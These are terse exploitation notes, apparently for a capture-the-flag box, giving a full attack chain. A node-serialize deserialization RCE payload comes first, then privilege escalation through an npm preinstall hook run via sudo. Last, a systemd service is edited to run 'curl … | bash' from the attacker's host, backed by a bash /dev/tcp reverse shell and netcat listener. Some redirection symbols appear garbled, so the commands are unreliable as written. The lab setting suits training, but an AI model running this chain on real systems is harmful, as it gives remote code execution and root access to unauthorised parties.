https://twitter.com/pixelbit131
Highly recommended to read this article: https://tinyurl.com/4svjt67a
Very important add IIFE brackets () after the function body. (min 07:54)
log.js
**********************************************************************
var y = {
rce: function(){*PASTE HERE THE OUTPUT OF nodeShell.py*}
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
**********************************************************************
nodeShell.py
https://github.com/piyush-saurabh/exploits/blob/master/nodejsshell.py
******************** GAINING ACCESS AS serv-manage *****************
cd /dev/shm
mkdir exploit
echo '{"scripts": {"preinstall": "/bin/sh"}}' -- exploit/package.json
sudo -u serv-manage /usr/bin/npm -C /dev/shm/exploit/ --unsafe-perm i
********************* GAINING ACCESS AS ROOT *********************
nano /etc/systemd/system/vulnnet-job.service
ExecStart=/bin/bash -c "curl 10.2.37.106:9013/shell.sh | bash"
Generate a REVERSE SHELL
nano shell.sh
bash -i --& /dev/tcp/10.2.37.106/8013 0--&1
k4is3r@parrot: python3 -m http.server 9013
k4is3r@parrot: nc -nlvp 8013
